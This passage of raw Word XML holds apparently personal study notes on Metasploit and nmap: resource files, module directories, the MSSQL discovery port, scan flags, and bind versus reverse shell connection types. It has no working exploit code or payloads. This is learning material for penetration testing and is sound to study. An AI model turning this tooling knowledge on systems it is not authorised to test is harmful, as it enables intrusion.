          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>every layer of every protocol you can think of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F71A28D" w14:textId="0B1E9EAC" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>cool for system admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3575C4E1" w14:textId="21763F4C" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">don't need to download a </w:t>
      </w:r>
      <w:r w:rsidR="00A95E1B" w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>separate</w:t>
      </w:r>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:r w:rsidR="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020EB46C" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BB391F" w14:textId="0C93A153" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">irb - starts ruby </w:t>
      </w:r>
      <w:r w:rsidR="00A95E1B" w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408B100D" w14:textId="3DE10E1B" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>resource files can read a file and run msfconsole commands line by line</w:t>
      </w:r>
      <w:r w:rsidR="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F39D57" w14:textId="7DE6FC9E" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>can also run ruby code</w:t>
      </w:r>
      <w:r w:rsidR="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E7E4A6" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003BB08A" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Directory layout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF057C2" w14:textId="37DD523B" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">lib/ - where all the cool kids </w:t>
      </w:r>
      <w:r w:rsidR="00A95E1B" w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>hang.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6354BD" w14:textId="66139AF1" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">data/ - </w:t>
      </w:r>
      <w:r w:rsidR="00A95E1B" w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>fields</w:t>
      </w:r>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> used by exploits and parts of MSF (static)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6C5C5" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ACDEF81" w14:textId="3B0B39E7" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">mssql runs on different ports - doesn't always run on </w:t>
      </w:r>
      <w:r w:rsidR="00A95E1B" w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>1434.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496A1901" w14:textId="00ACB20F" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>1434 is discovery port, will tell what ports mssql is actually running on</w:t>
      </w:r>
      <w:r w:rsidR="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064E1FFF" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E2AF0" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Auxiliary Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3226F5" w14:textId="3BEC5840" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">admin/ - administrative </w:t>
      </w:r>
      <w:r w:rsidR="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0D62E4" w14:textId="1D4C5E55" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>scanner/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B978F29" w14:textId="11AFC710" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>server/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505BD290" w14:textId="43515F1B" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sniffer/ spoof/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA9C0C4" w14:textId="07EA1D45" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>lots more</w:t>
      </w:r>
      <w:r w:rsidR="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245512F8" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="725D1415" w14:textId="04D8C680" w:rsidR="00A95E1B" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>may define actions</w:t>
      </w:r>
      <w:r w:rsidR="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CC338D" w14:textId="26BB91E5" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">somewhat </w:t>
      </w:r>
      <w:r w:rsidR="00A95E1B" w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>like</w:t>
      </w:r>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E280DE" w14:textId="2EDADE01" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>can have options</w:t>
      </w:r>
      <w:r w:rsidR="00542C60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2176738E" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583BDD2F" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA142AC" w14:textId="4E999E75" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-sC runs scripts against services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448777DB" w14:textId="3A6F5E58" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-oX output as xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0DEF51" w14:textId="30B1C4E2" w:rsidR="007B3D1E" w:rsidRPr="00A95E1B" w:rsidRDefault="007B3D1E" w:rsidP="00A95E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">-oA is </w:t>
      </w:r>
      <w:r w:rsidR="00542C60" w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>preferred</w:t>
      </w:r>
      <w:r w:rsidRPr="00A95E1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it outputs all types (?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA2B956" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ACF9F3" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3 general connection types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FDB3B8" w14:textId="715572D2" w:rsidR="007B3D1E" w:rsidRPr="00542C60" w:rsidRDefault="007B3D1E" w:rsidP="00542C60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542C60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">bind - attacker connects to </w:t>
      </w:r>
      <w:r w:rsidR="00542C60" w:rsidRPr="00542C60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E48EE2" w14:textId="1132107F" w:rsidR="007B3D1E" w:rsidRPr="00542C60" w:rsidRDefault="007B3D1E" w:rsidP="00542C60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542C60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">good if </w:t>
      </w:r>
      <w:r w:rsidR="00836447" w:rsidRPr="00542C60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>the attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00542C60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a </w:t>
      </w:r>
      <w:r w:rsidR="00542C60" w:rsidRPr="00542C60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324A4374" w14:textId="659E033D" w:rsidR="007B3D1E" w:rsidRPr="00542C60" w:rsidRDefault="007B3D1E" w:rsidP="00542C60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542C60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse - victim </w:t>
      </w:r>
      <w:r w:rsidR="00836447" w:rsidRPr="00542C60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>connects to</w:t>
      </w:r>
      <w:r w:rsidRPr="00542C60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacker</w:t>
      </w:r>
      <w:r w:rsidR="00836447">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A7A54" w14:textId="395F74FA" w:rsidR="007B3D1E" w:rsidRPr="00836447" w:rsidRDefault="007B3D1E" w:rsidP="00836447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00836447">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">good if </w:t>
      </w:r>
      <w:r w:rsidR="00836447" w:rsidRPr="00836447">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>the victim</w:t>
      </w:r>
      <w:r w:rsidRPr="00836447">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a </w:t>
      </w:r>
      <w:r w:rsidR="00836447" w:rsidRPr="00836447">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B03C367" w14:textId="402AD305" w:rsidR="007B3D1E" w:rsidRPr="00FB40DA" w:rsidRDefault="007B3D1E" w:rsidP="00FB40DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>find - socket used for exploit becomes shell</w:t>
      </w:r>
      <w:r w:rsidR="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
